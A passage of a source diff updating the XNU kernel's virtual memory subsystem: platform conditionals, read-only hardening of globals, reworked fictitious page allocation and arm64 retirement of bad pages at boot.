+       if (thread->reserved_stack == 0) {
+               assert(thread->kernel_stack);
+               thread->reserved_stack = thread->kernel_stack;
+       }
+
+       thread_mtx_lock(thread);
+       thread_start(thread);
+       thread_mtx_unlock(thread);
+
        thread_deallocate(thread);
 
 #if VM_PRESSURE_EVENTS
@@ -5010,15 +5016,15 @@ vm_pageout_internal_start(void)
 
        assert(hinfo.max_cpus > 0);
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        vm_pageout_state.vm_compressor_thread_count = 1;
-#else
+#else /* !XNU_TARGET_OS_OSX */
        if (hinfo.max_cpus > 4) {
                vm_pageout_state.vm_compressor_thread_count = 2;
        } else {
                vm_pageout_state.vm_compressor_thread_count = 1;
        }
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
        PE_parse_boot_argn("vmcomp_threads", &vm_pageout_state.vm_compressor_thread_count,
            sizeof(vm_pageout_state.vm_compressor_thread_count));
 
@@ -5339,27 +5345,19 @@ must_throttle_writes()
 #define MAX_DELAYED_WORK_CTX_ALLOCATED  (512)
 
 int vm_page_delayed_work_ctx_needed = 0;
-zone_t  dw_ctx_zone = ZONE_NULL;
+SECURITY_READ_ONLY_LATE(zone_t) dw_ctx_zone;
 
 void
 vm_page_delayed_work_init_ctx(void)
 {
-       int nelems = 0, elem_size = 0;
-
-       elem_size = sizeof(struct vm_page_delayed_work_ctx);
+       size_t elem_size = sizeof(struct vm_page_delayed_work_ctx);
 
        dw_ctx_zone = zone_create_ext("delayed-work-ctx", elem_size,
            ZC_NOGC, ZONE_ID_ANY, ^(zone_t z) {
-               zone_set_exhaustible(z, MAX_DELAYED_WORK_CTX_ALLOCATED * elem_size);
+               zone_set_exhaustible(z, MAX_DELAYED_WORK_CTX_ALLOCATED);
        });
 
-       nelems = zfill(dw_ctx_zone, MIN_DELAYED_WORK_CTX_ALLOCATED);
-       if (nelems < MIN_DELAYED_WORK_CTX_ALLOCATED) {
-               printf("vm_page_delayed_work_init_ctx: Failed to preallocate minimum delayed work contexts (%d vs %d).\n", nelems, MIN_DELAYED_WORK_CTX_ALLOCATED);
-#if DEVELOPMENT || DEBUG
-               panic("Failed to preallocate minimum delayed work contexts (%d vs %d).\n", nelems, MIN_DELAYED_WORK_CTX_ALLOCATED);
-#endif /* DEVELOPMENT || DEBUG */
-       }
+       zone_fill_initially(dw_ctx_zone, MIN_DELAYED_WORK_CTX_ALLOCATED);
 }
 
 struct vm_page_delayed_work*
@@ -5578,7 +5576,7 @@ vm_object_upl_request(
                    "object %p shadow_offset 0x%llx",
                    upl->map_object, upl->map_object->vo_shadow_offset);
 
-               VM_PAGE_GRAB_FICTITIOUS(alias_page);
+               alias_page = vm_page_grab_fictitious(TRUE);
 
                upl->flags |= UPL_SHADOWED;
        }
@@ -5648,11 +5646,11 @@ vm_object_upl_request(
        if ((cntrl_flags & UPL_WILL_MODIFY) && must_throttle_writes() == TRUE) {
                boolean_t       isSSD = FALSE;
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
                isSSD = TRUE;
-#else
+#else /* !XNU_TARGET_OS_OSX */
                vnode_pager_get_isSSD(object->pager, &isSSD);
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
                vm_object_unlock(object);
 
                OSAddAtomic(size_in_pages, &vm_upl_wait_for_pages);
@@ -5672,7 +5670,7 @@ vm_object_upl_request(
 
                if ((alias_page == NULL) && !(cntrl_flags & UPL_SET_LITE)) {
                        vm_object_unlock(object);
-                       VM_PAGE_GRAB_FICTITIOUS(alias_page);
+                       alias_page = vm_page_grab_fictitious(TRUE);
                        vm_object_lock(object);
                }
                if (cntrl_flags & UPL_COPYOUT_FROM) {
@@ -6030,7 +6028,7 @@ check_busy:
                                        dst_page->vmp_clustered = TRUE;
 
                                        if (!(cntrl_flags & UPL_FILE_IO)) {
-                                               VM_STAT_INCR(pageins);
+                                               counter_inc(&vm_statistics_pageins);
                                        }
                                }
                        }
@@ -6201,7 +6199,7 @@ check_busy:
 try_next_page:
                if (dwp->dw_mask) {
                        if (dwp->dw_mask & DW_vm_page_activate) {
-                               VM_STAT_INCR(reactivations);
+                               counter_inc(&vm_statistics_reactivations);
                        }
 
                        VM_PAGE_ADD_DELAYED_WORK(dwp, dst_page, dw_count);
@@ -6462,7 +6460,7 @@ REDISCOVER_ENTRY:
                goto done;
        }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        if (map->pmap != kernel_pmap &&
            (caller_flags & UPL_COPYOUT_FROM) &&
            (entry->protection & VM_PROT_EXECUTE) &&
@@ -6531,7 +6529,7 @@ REDISCOVER_ENTRY:
 #endif /* DEVELOPMENT || DEBUG */
                goto done;
        }
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
        local_object = VME_OBJECT(entry);
        assert(local_object != VM_OBJECT_NULL);
@@ -6637,24 +6635,6 @@ REDISCOVER_ENTRY:
                vm_map_t                real_map;
                vm_prot_t               fault_type;
 
-               if (entry->vme_start < VM_MAP_TRUNC_PAGE(offset, VM_MAP_PAGE_MASK(map)) ||
-                   entry->vme_end > VM_MAP_ROUND_PAGE(offset + *upl_size, VM_MAP_PAGE_MASK(map))) {
-                       /*
-                        * Clip the requested range first to minimize the
-                        * amount of potential copying...
-                        */
-                       if (vm_map_lock_read_to_write(map)) {
-                               goto REDISCOVER_ENTRY;
-                       }
-                       vm_map_lock_assert_exclusive(map);
-                       assert(VME_OBJECT(entry) == local_object);
-                       vm_map_clip_start(map, entry,
-                           VM_MAP_TRUNC_PAGE(offset, VM_MAP_PAGE_MASK(map)));
-                       vm_map_clip_end(map, entry,
-                           VM_MAP_ROUND_PAGE(offset + *upl_size, VM_MAP_PAGE_MASK(map)));
-                       vm_map_lock_write_to_read(map);
-               }
-
                local_map = map;
 
                if (caller_flags & UPL_COPYOUT_FROM) {
@@ -7009,7 +6989,7 @@ process_upl_to_enter:
                        assert(pg_num == new_offset / PAGE_SIZE);
 
                        if (lite_list[pg_num >> 5] & (1U << (pg_num & 31))) {
-                               VM_PAGE_GRAB_FICTITIOUS(alias_page);
+                               alias_page = vm_page_grab_fictitious(TRUE);
 
                                vm_object_lock(object);
 
@@ -7739,7 +7719,7 @@ process_upl_to_commit:
                                dwp->dw_mask |= DW_vm_page_activate | DW_PAGE_WAKEUP;
 
                                if (upl->flags & UPL_PAGEOUT) {
-                                       VM_STAT_INCR(reactivations);
+                                       counter_inc(&vm_statistics_reactivations);
                                        DTRACE_VM2(pgrec, int, 1, (uint64_t *), NULL);
                                }
                        } else {
@@ -7780,7 +7760,7 @@ process_upl_to_commit:
                if (hibernate_cleaning_in_progress == FALSE && !m->vmp_dirty && (upl->flags & UPL_PAGEOUT)) {
                        pgpgout_count++;
 
-                       VM_STAT_INCR(pageouts);
+                       counter_inc(&vm_statistics_pageouts);
                        DTRACE_VM2(pgout, int, 1, (uint64_t *), NULL);
 
                        dwp->dw_mask |= DW_enqueue_cleaned;
@@ -9672,7 +9652,7 @@ return_err:
                vm_page_unlock_queues();
 
                if (need_unwire == TRUE) {
-                       VM_STAT_INCR(reactivations);
+                       counter_inc(&vm_statistics_reactivations);
                }
        }
 #if UPL_DEBUG
index 980095f6f9c53f734646082224b5f3cf96a9a7a4..94e667ca4fa7bcdf222a3fb89438cb814d68e550 100644 (file)
@@ -227,7 +227,11 @@ extern upl_size_t upl_get_size(
 extern upl_t upl_associated_upl(upl_t upl);
 extern void upl_set_associated_upl(upl_t upl, upl_t associated_upl);
 
+#ifndef MACH_KERNEL_PRIVATE
+typedef struct vm_page  *vm_page_t;
+#endif
 #ifdef  XNU_KERNEL_PRIVATE
+#include <vm/vm_kern.h>
 
 extern upl_size_t upl_adjusted_size(
        upl_t upl,
@@ -252,22 +256,18 @@ extern void iopl_valid_data(
        upl_t                   upl_ptr,
        vm_tag_t        tag);
 
-#endif  /* XNU_KERNEL_PRIVATE */
-
-extern struct vnode * upl_lookup_vnode(upl_t upl);
-
-#ifndef MACH_KERNEL_PRIVATE
-typedef struct vm_page  *vm_page_t;
-#endif
-
-extern void                vm_page_free_list(
+extern void               vm_page_free_list(
        vm_page_t   mem,
        boolean_t   prepare_object);
 
 extern kern_return_t      vm_page_alloc_list(
        int         page_count,
-       int                 flags,
-       vm_page_t * list);
+       kma_flags_t flags,
+       vm_page_t  *list);
+
+#endif  /* XNU_KERNEL_PRIVATE */
+
+extern struct vnode * upl_lookup_vnode(upl_t upl);
 
 extern void               vm_page_set_offset(vm_page_t page, vm_object_offset_t offset);
 extern vm_object_offset_t vm_page_get_offset(vm_page_t page);
@@ -276,9 +276,9 @@ extern vm_page_t          vm_page_get_next(vm_page_t page);
 
 extern kern_return_t    mach_vm_pressure_level_monitor(boolean_t wait_for_pressure, unsigned int *pressure_level);
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 extern kern_return_t    vm_pageout_wait(uint64_t deadline);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 #ifdef  MACH_KERNEL_PRIVATE
 
index 01e0711b3ca10cfd3611420f1b4c069f2f546661..c0a74a04f153bd10cf4d2f160bc96633d114b7b1 100644 (file)
 
 uint32_t phantom_cache_eval_period_in_msecs = 250;
 uint32_t phantom_cache_thrashing_threshold_ssd = 1000;
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 uint32_t phantom_cache_thrashing_threshold = 500;
-#else
+#else /* !XNU_TARGET_OS_OSX */
 uint32_t phantom_cache_thrashing_threshold = 50;
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 /*
  * Number of consecutive thrashing periods required before
  * vm_phantom_cache_check_pressure() returns true.
  */
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 unsigned phantom_cache_contiguous_periods = 4;
-#else
+#else /* !XNU_TARGET_OS_OSX */
 unsigned phantom_cache_contiguous_periods = 2;
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 clock_sec_t     pc_start_of_eval_period_sec = 0;
 clock_nsec_t    pc_start_of_eval_period_nsec = 0;
@@ -113,11 +113,11 @@ vm_phantom_cache_init()
        if (!VM_CONFIG_COMPRESSOR_IS_ACTIVE) {
                return;
        }
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        num_entries = (uint32_t)(((max_mem / PAGE_SIZE) / 10) / VM_GHOST_PAGES_PER_ENTRY);
-#else
+#else /* !XNU_TARGET_OS_OSX */
        num_entries = (uint32_t)(((max_mem / PAGE_SIZE) / 4) / VM_GHOST_PAGES_PER_ENTRY);
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
        vm_phantom_cache_num_entries = 1;
 
        while (vm_phantom_cache_num_entries < num_entries) {
index 50a654348f40b6943e3557ea0dd19c046cf33966..78b5a746d5eecc5de487119ec9be4a07d6b16df2 100644 (file)
@@ -71,8 +71,13 @@ extern boolean_t vm_swap_files_pinned(void);
 extern mach_port_name_t ipc_port_copyout_send(
        ipc_port_t      sright,
        ipc_space_t     space);
+extern mach_port_name_t ipc_port_copyout_send_pinned(
+       ipc_port_t      sright,
+       ipc_space_t     space);
 extern task_t port_name_to_task(
        mach_port_name_t name);
+extern task_t port_name_to_task_read(
+       mach_port_name_t name);
 extern task_t port_name_to_task_name(
        mach_port_name_t name);
 extern void ipc_port_release_send(
@@ -96,6 +101,7 @@ extern void consider_machine_adjust(void);
 extern vm_map_offset_t get_map_min(vm_map_t);
 extern vm_map_offset_t get_map_max(vm_map_t);
 extern vm_map_size_t get_vmmap_size(vm_map_t);
+extern int get_task_page_size(task_t);
 #if CONFIG_COREDUMP
 extern int get_vmmap_entries(vm_map_t);
 #endif
@@ -178,7 +184,8 @@ extern memory_object_t apple_protect_pager_setup(
        vm_object_offset_t      crypto_backing_offset,
        struct pager_crypt_info *crypt_info,
        vm_object_offset_t      crypto_start,
-       vm_object_offset_t      crypto_end);
+       vm_object_offset_t      crypto_end,
+       boolean_t               cache_pager);
 #endif  /* CONFIG_CODE_DECRYPTION */
 
 struct vm_shared_region_slide_info;
@@ -590,6 +597,20 @@ extern unsigned int mach_vm_ctl_page_free_wanted(void);
 
 extern int no_paging_space_action(void);
 
+/*
+ * counts updated by revalidate_text_page()
+ */
+extern unsigned int vmtc_total;        /* total # of text page corruptions detected */
+extern unsigned int vmtc_undiagnosed;  /* of that what wasn't diagnosed */
+extern unsigned int vmtc_not_eligible; /* failed to correct, due to page attributes */
+extern unsigned int vmtc_copyin_fail;  /* of undiagnosed, copyin failure count */
+extern unsigned int vmtc_not_found;    /* of diagnosed, no error found - code signing error? */
+extern unsigned int vmtc_one_bit_flip; /* of diagnosed, single bit errors */
+#define MAX_TRACK_POWER2 9             /* of diagnosed, counts of 1, 2, 4,... bytes corrupted */
+extern unsigned int vmtc_byte_counts[MAX_TRACK_POWER2 + 1];
+
+extern kern_return_t revalidate_text_page(task_t, vm_map_offset_t);
+
 #define VM_TOGGLE_CLEAR         0
 #define VM_TOGGLE_SET           1
 #define VM_TOGGLE_GETVALUE      999
index b44ec0cf8dd2e056dca8dcf920d94cf328b79d03..08355b9e543a3d027351c9c9b5e025fb540a0cda 100644 (file)
@@ -736,13 +736,13 @@ vm_purgeable_object_find_and_lock(
                 */
                owner = object->vo_owner;
                if (owner != NULL && owner != VM_OBJECT_OWNER_DISOWNED) {
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #if CONFIG_JETSAM
                        object_task_importance = proc_get_memstat_priority((struct proc *)get_bsdtask_info(owner), TRUE);
 #endif /* CONFIG_JETSAM */
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
                        object_task_importance = task_importance_estimate(owner);
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
                }
 
                if (object_task_importance < best_object_task_importance) {
index ca78ec877f4cdd5dd48b7d5b6498c5ef11382fcb..0cb0914af16ab1203fe11bec4fafaf5698a59f2b 100644 (file)
@@ -70,7 +70,7 @@
 #include <mach/vm_prot.h>
 #include <mach/vm_statistics.h>
 #include <mach/sdt.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/host_statistics.h>
 #include <kern/sched_prim.h>
 #include <kern/policy_internal.h>
@@ -169,11 +169,13 @@ boolean_t       hibernation_vmqueues_inspection = FALSE; /* Tracks if the hibern
                                                           * Updated and checked behind the vm_page_queues_lock. */
 
 static void             vm_page_free_prepare(vm_page_t  page);
-static vm_page_t        vm_page_grab_fictitious_common(ppnum_t phys_addr);
+static vm_page_t        vm_page_grab_fictitious_common(ppnum_t, boolean_t);
 
 static void vm_tag_init(void);
 
 /* for debugging purposes */
+SECURITY_READ_ONLY_EARLY(uint32_t) vm_packed_from_vm_pages_array_mask =
+    VM_PAGE_PACKED_FROM_ARRAY;
 SECURITY_READ_ONLY_EARLY(vm_packing_params_t) vm_page_packing_params =
     VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR);
 
@@ -211,12 +213,12 @@ typedef struct {
 
 #define BUCKETS_PER_LOCK        16
 
-vm_page_bucket_t *vm_page_buckets;              /* Array of buckets */
-unsigned int    vm_page_bucket_count = 0;       /* How big is array? */
-unsigned int    vm_page_hash_mask;              /* Mask for hash function */
-unsigned int    vm_page_hash_shift;             /* Shift for hash function */
-uint32_t        vm_page_bucket_hash;            /* Basic bucket hash */
-unsigned int    vm_page_bucket_lock_count = 0;          /* How big is array of locks? */
+SECURITY_READ_ONLY_LATE(vm_page_bucket_t *) vm_page_buckets;                /* Array of buckets */
+SECURITY_READ_ONLY_LATE(unsigned int)       vm_page_bucket_count = 0;       /* How big is array? */
+SECURITY_READ_ONLY_LATE(unsigned int)       vm_page_hash_mask;              /* Mask for hash function */
+SECURITY_READ_ONLY_LATE(unsigned int)       vm_page_hash_shift;             /* Shift for hash function */
+SECURITY_READ_ONLY_LATE(uint32_t)           vm_page_bucket_hash;            /* Basic bucket hash */
+SECURITY_READ_ONLY_LATE(unsigned int)       vm_page_bucket_lock_count = 0;  /* How big is array of locks? */
 
 #ifndef VM_TAG_ACTIVE_UPDATE
 #error VM_TAG_ACTIVE_UPDATE
@@ -225,13 +227,14 @@ unsigned int    vm_page_bucket_lock_count = 0;          /* How big is array of l
 #error VM_MAX_TAG_ZONES
 #endif
 
-boolean_t   vm_tag_active_update = VM_TAG_ACTIVE_UPDATE;
-lck_spin_t      *vm_page_bucket_locks;
+/* for debugging */
+SECURITY_READ_ONLY_LATE(bool) vm_tag_active_update = VM_TAG_ACTIVE_UPDATE;
+SECURITY_READ_ONLY_LATE(lck_spin_t *) vm_page_bucket_locks;
 
 vm_allocation_site_t            vm_allocation_sites_static[VM_KERN_MEMORY_FIRST_DYNAMIC + 1];
 vm_allocation_site_t *          vm_allocation_sites[VM_MAX_TAG_VALUE];
 #if VM_MAX_TAG_ZONES
-vm_allocation_zone_total_t **   vm_allocation_zone_totals;
+static vm_allocation_zone_total_t **vm_allocation_zone_totals;
 #endif /* VM_MAX_TAG_ZONES */
 
 vm_tag_t vm_allocation_tag_highest;
@@ -244,8 +247,6 @@ vm_map_offset_t vm_page_fake_buckets_start, vm_page_fake_buckets_end;
 #endif /* VM_PAGE_FAKE_BUCKETS */
 #endif /* VM_PAGE_BUCKETS_CHECK */
 
-
-
 #if     MACH_PAGE_HASH_STATS
 /* This routine is only for debug.  It is intended to be called by
  * hand by a developer using a kernel debugger.  This routine prints
@@ -353,7 +354,6 @@ LCK_GRP_DECLARE(vm_page_lck_grp_local, "vm_page_queue_local");
 LCK_GRP_DECLARE(vm_page_lck_grp_purge, "vm_page_purge");
 LCK_GRP_DECLARE(vm_page_lck_grp_alloc, "vm_page_alloc");
 LCK_GRP_DECLARE(vm_page_lck_grp_bucket, "vm_page_bucket");
-LCK_MTX_EARLY_DECLARE_ATTR(vm_page_alloc_lock, &vm_page_lck_grp_alloc, &vm_page_lck_attr);
 LCK_SPIN_DECLARE_ATTR(vm_objects_wired_lock, &vm_page_lck_grp_bucket, &vm_page_lck_attr);
 LCK_SPIN_DECLARE_ATTR(vm_allocation_sites_lock, &vm_page_lck_grp_bucket, &vm_page_lck_attr);
 
@@ -1331,6 +1331,24 @@ pmap_steal_freeable_memory(
        return pmap_steal_memory_internal(size, TRUE);
 }
 
+#if defined(__arm64__)
+/*
+ * Retire a page at startup.
+ * These pages will eventually wind up on the retired_pages_object
+ * in vm_retire_boot_pages().
+ */
+static vm_page_queue_head_t vm_page_queue_retired VM_PAGE_PACKED_ALIGNED;
+static void
+vm_page_retire_startup(vm_page_t p)
+{
+       p->vmp_q_state = VM_PAGE_NOT_ON_Q;
+       p->vmp_error = true;
+       p->vmp_unusual = true;
+       vm_page_queue_enter(&vm_page_queue_retired, p, vmp_pageq);
+       printf("To be retired at boot: page at 0x%llx\n", (long long)ptoa(VM_PAGE_GET_PHYS_PAGE(p)));
+}
+#endif /* defined(__arm64__) */
+
 #if CONFIG_SECLUDED_MEMORY
 /* boot-args to control secluded memory */
 unsigned int secluded_mem_mb = 0;       /* # of MBs of RAM to seclude */
@@ -1382,8 +1400,15 @@ pmap_startup(
         * the memory needed to map what's being allocated, i.e. the page
         * table entries. So the actual number of pages we get will be
         * less than this. To do someday: include that in the computation.
+        *
+        * Also for ARM, we don't use the count of free_pages, but rather the
+        * range from last page to first page (ignore holes due to retired pages).
         */
+#if defined(__arm__) || defined(__arm64__)
+       mem_sz = pmap_free_pages_span() * (uint64_t)PAGE_SIZE;
+#else /* defined(__arm__) || defined(__arm64__) */
        mem_sz = pmap_free_pages() * (uint64_t)PAGE_SIZE;
+#endif /* defined(__arm__) || defined(__arm64__) */
        mem_sz += round_page(virtual_space_start) - virtual_space_start;        /* Account for any slop */
        npages = (uint_t)(mem_sz / (PAGE_SIZE + sizeof(*vm_pages)));    /* scaled to include the vm_page_ts */
 
@@ -1509,6 +1534,9 @@ pmap_startup(
 #endif
 
        vm_delayed_count = 0;
+#if defined(__arm64__)
+       vm_page_queue_init(&vm_page_queue_retired);
+#endif /* defined(__arm64__) */
 
        absolutetime_to_nanoseconds(mach_absolute_time(), &start_ns);
        vm_pages_count = 0;
@@ -1533,9 +1561,24 @@ pmap_startup(
                        vm_first_phys_ppnum = phys_page;
                        patch_low_glo_vm_page_info((void *)vm_page_array_beginning_addr,
                            (void *)vm_page_array_ending_addr, vm_first_phys_ppnum);
+#if defined(__arm64__)
+               } else {
+                       /*
+                        * pmap_next_page() may skip over pages reported bad by iboot.
+                        */
+                       while (i < phys_page - vm_first_phys_ppnum && i < npages) {
+                               ++vm_pages_count;
+                               vm_page_init(&vm_pages[i], i + vm_first_phys_ppnum, FALSE);
+                               vm_page_retire_startup(&vm_pages[i]);
+                               ++i;
+                       }
+                       if (i >= npages) {
+                               break;
+                       }
+                       assert(i == phys_page - vm_first_phys_ppnum);
+#endif /* defined(__arm64__) */
                }
-               assert((i + vm_first_phys_ppnum) == phys_page);
-#endif
+#endif /* defined(__arm__) || defined(__arm64__) */
 
 #if defined(__x86_64__)
                /* The x86 clump freeing code requires increasing ppn's to work correctly */
@@ -1556,7 +1599,9 @@ pmap_startup(
 
        if (!vm_himemory_mode) {
                do {
-                       vm_page_release_startup(&vm_pages[--i]);
+                       if (!vm_pages[--i].vmp_error) {               /* skip retired pages */
+                               vm_page_release_startup(&vm_pages[i]);
+                       }
                } while (i != 0);
        }
 
@@ -1603,13 +1648,15 @@ vm_page_module_init_delayed(void)
                 * Reflect size and usage information for vm_pages[].
                 */
 
-               z->countavail = (uint32_t)(vm_page_array_ending_addr - vm_pages);
-               z->countfree = z->countavail - vm_pages_count;
+               z->z_elems_avail = (uint32_t)(vm_page_array_ending_addr - vm_pages);
+               z->z_elems_free = z->z_elems_avail - vm_pages_count;
                zpercpu_get_cpu(z->z_stats, 0)->zs_mem_allocated =
                vm_pages_count * sizeof(struct vm_page);
                vm_page_array_zone_data_size = (uintptr_t)((void *)vm_page_array_ending_addr - (void *)vm_pages);
                vm_page_zone_pages = atop(round_page((vm_offset_t)vm_page_array_zone_data_size));
-               z->page_count += vm_page_zone_pages;
+               z->z_wired_cur += vm_page_zone_pages;
+               z->z_wired_hwm = z->z_wired_cur;
+               z->z_va_cur = z->z_wired_cur;
                /* since zone accounts for these, take them out of stolen */
                VM_PAGE_MOVE_STOLEN(vm_page_zone_pages);
        });
@@ -1636,12 +1683,23 @@ vm_page_module_init(void)
            ~(VM_PAGE_PACKED_PTR_ALIGNMENT - 1);
 
        vm_page_zone = zone_create_ext("vm pages", vm_page_with_ppnum_size,
-           ZC_ALLOW_FOREIGN | ZC_NOGZALLOC | ZC_ALIGNMENT_REQUIRED |
-           ZC_NOCALLOUT, ZONE_ID_ANY, ^(zone_t z) {
+           ZC_NOGZALLOC | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, ^(zone_t z) {
 #if defined(__LP64__)
-               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP);
+               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED);
 #endif
-               zone_set_exhaustible(z, 0);
+               /*
+                * The number "10" is a small number that is larger than the number
+                * of fictitious pages that any single caller will attempt to allocate
+                * without blocking.
+                *
+                * The largest such number at the moment is kernel_memory_allocate()
+                * when 2 guard pages are asked. 10 is simply a somewhat larger number,
+                * taking into account the 50% hysteresis the zone allocator uses.
+                *
+                * Note: this works at all because the zone allocator
+                *       doesn't ever allocate fictitious pages.
+                */
+               z->z_elems_rsv = 10;
        });
 }
 STARTUP(ZALLOC, STARTUP_RANK_SECOND, vm_page_module_init);
@@ -1666,11 +1724,7 @@ vm_page_create(
        for (phys_page = start;
            phys_page < end;
            phys_page++) {
-               while ((m = (vm_page_t) vm_page_grab_fictitious_common(phys_page))
-                   == VM_PAGE_NULL) {
-                       vm_page_more_fictitious();
-               }
-
+               m = vm_page_grab_fictitious_common(phys_page, TRUE);
                m->vmp_fictitious = FALSE;
                pmap_clear_noencrypt(phys_page);
 
@@ -1681,6 +1735,38 @@ vm_page_create(
        }
 }
 
+#if defined(__arm64__)
+/*
+ * Like vm_page_create(), except we want to immediately retire the page,
+ * not put it on the free list.
+ */
+void
+vm_page_create_retired(
+       ppnum_t   phys_page)
+{
+       vm_page_t m;
+
+       m = vm_page_grab_fictitious_common(phys_page, TRUE);
+       m->vmp_fictitious = FALSE;
+       pmap_clear_noencrypt(phys_page);
+       m->vmp_error = true;
+       m->vmp_unusual = true;
+       vm_page_lock_queues();
+       m->vmp_q_state = VM_PAGE_IS_WIRED;
+       m->vmp_wire_count++;
+       vm_page_unlock_queues();
+
+       lck_mtx_lock(&vm_page_queue_free_lock);
+       vm_page_pages++;
+       lck_mtx_unlock(&vm_page_queue_free_lock);
+
+       vm_object_lock(retired_pages_object);
+       vm_page_insert_wired(m, retired_pages_object, ptoa(VM_PAGE_GET_PHYS_PAGE(m)), VM_KERN_MEMORY_RETIRED);
+       vm_object_unlock(retired_pages_object);
+       pmap_retire_page(VM_PAGE_GET_PHYS_PAGE(m));
+}
+#endif /* defined(__arm64__) */
+
 /*
  *     vm_page_hash:
  *
@@ -2621,43 +2707,34 @@ vm_page_init(
  *     Remove a fictitious page from the free list.
  *     Returns VM_PAGE_NULL if there are no free pages.
  */
-int     c_vm_page_grab_fictitious = 0;
-int     c_vm_page_grab_fictitious_failed = 0;
-int     c_vm_page_release_fictitious = 0;
-int     c_vm_page_more_fictitious = 0;
 
-vm_page_t
-vm_page_grab_fictitious_common(
-       ppnum_t phys_addr)
+static vm_page_t
+vm_page_grab_fictitious_common(ppnum_t phys_addr, boolean_t canwait)
 {
-       vm_page_t       m;
+       vm_page_t m;
 
-       if ((m = (vm_page_t)zalloc_noblock(vm_page_zone))) {
+       m = zalloc_flags(vm_page_zone, canwait ? Z_WAITOK : Z_NOWAIT);
+       if (m) {
                vm_page_init(m, phys_addr, FALSE);
                m->vmp_fictitious = TRUE;
-
-               c_vm_page_grab_fictitious++;
-       } else {
-               c_vm_page_grab_fictitious_failed++;
        }
-
        return m;
 }
 
 vm_page_t
-vm_page_grab_fictitious(void)
+vm_page_grab_fictitious(boolean_t canwait)
 {
-       return vm_page_grab_fictitious_common(vm_page_fictitious_addr);
+       return vm_page_grab_fictitious_common(vm_page_fictitious_addr, canwait);
 }
 
 int vm_guard_count;
 
 
 vm_page_t
-vm_page_grab_guard(void)
+vm_page_grab_guard(boolean_t canwait)
 {
        vm_page_t page;
-       page = vm_page_grab_fictitious_common(vm_page_guard_addr);
+       page = vm_page_grab_fictitious_common(vm_page_guard_addr, canwait);
        if (page) {
                OSAddAtomic(1, &vm_guard_count);
        }
@@ -2684,91 +2761,9 @@ vm_page_release_fictitious(
                OSAddAtomic(-1, &vm_guard_count);
        }
 
-       c_vm_page_release_fictitious++;
-
        zfree(vm_page_zone, m);
 }
 
-/*
- *     vm_page_more_fictitious:
- *
- *     Add more fictitious pages to the zone.
- *     Allowed to block. This routine is way intimate
- *     with the zones code, for several reasons:
- *     1. we need to carve some page structures out of physical
- *        memory before zones work, so they _cannot_ come from
- *        the zone restricted submap.
- *     2. the zone needs to be collectable in order to prevent
- *        growth without bound. These structures are used by
- *        the device pager (by the hundreds and thousands), as
- *        private pages for pageout, and as blocking pages for
- *        pagein. Temporary bursts in demand should not result in
- *        permanent allocation of a resource.
- *     3. To smooth allocation humps, we allocate single pages
- *        with kernel_memory_allocate(), and cram them into the
- *        zone.
- */
-
-void
-vm_page_more_fictitious(void)
-{
-       vm_offset_t     addr;
-       kern_return_t   retval;
-
-       c_vm_page_more_fictitious++;
-
-       /*
-        * Allocate a single page from the zone restricted submap. Do not wait
-        * if no physical pages are immediately available, and do not zero the
-        * space. We need our own blocking lock here to prevent having multiple,
-        * simultaneous requests from piling up on the zone restricted submap
-        * lock.
-        * Exactly one (of our) threads should be potentially waiting on the map
-        * lock.  If winner is not vm-privileged, then the page allocation will
-        * fail, and it will temporarily block here in the vm_page_wait().
-        */
-       lck_mtx_lock(&vm_page_alloc_lock);
-       /*
-        * If another thread allocated space, just bail out now.
-        */
-       if (os_atomic_load(&vm_page_zone->countfree, relaxed) > 5) {
-               /*
-                * The number "5" is a small number that is larger than the
-                * number of fictitious pages that any single caller will
-                * attempt to allocate. Otherwise, a thread will attempt to
-                * acquire a fictitious page (vm_page_grab_fictitious), fail,
-                * release all of the resources and locks already acquired,
-                * and then call this routine. This routine finds the pages
-                * that the caller released, so fails to allocate new space.
-                * The process repeats infinitely. The largest known number
-                * of fictitious pages required in this manner is 2. 5 is
-                * simply a somewhat larger number.
-                */
-               lck_mtx_unlock(&vm_page_alloc_lock);
-               return;
-       }
-
-       retval = kernel_memory_allocate(zone_submap(vm_page_zone),
-           &addr, PAGE_SIZE, 0, KMA_ZERO | KMA_KOBJECT | KMA_NOPAGEWAIT,
-           VM_KERN_MEMORY_ZONE);
-
-       if (retval != KERN_SUCCESS) {
-               /*
-                * No page was available. Drop the
-                * lock to give another thread a chance at it, and
-                * wait for the pageout daemon to make progress.
-                */
-               lck_mtx_unlock(&vm_page_alloc_lock);
-               vm_page_wait(THREAD_UNINT);
-               return;
-       }
-
-       zcram(vm_page_zone, addr, PAGE_SIZE);
-
-       lck_mtx_unlock(&vm_page_alloc_lock);
-}
-
-
 /*
  *     vm_pool_low():
  *
@@ -2776,7 +2771,7 @@ vm_page_more_fictitious(void)
  *     can get memory without blocking.  Advisory only, since the
  *     situation may change under us.
  */
-int
+bool
 vm_pool_low(void)
 {
        /* No locking, at worst we will fib. */
@@ -3053,15 +3048,12 @@ vm_page_grablo(void)
 
        VM_PAGE_ZERO_PAGEQ_ENTRY(mem);
 
-       disable_preemption();
-       *PERCPU_GET(vm_page_grab_count) += 1;
+       counter_inc(&vm_page_grab_count);
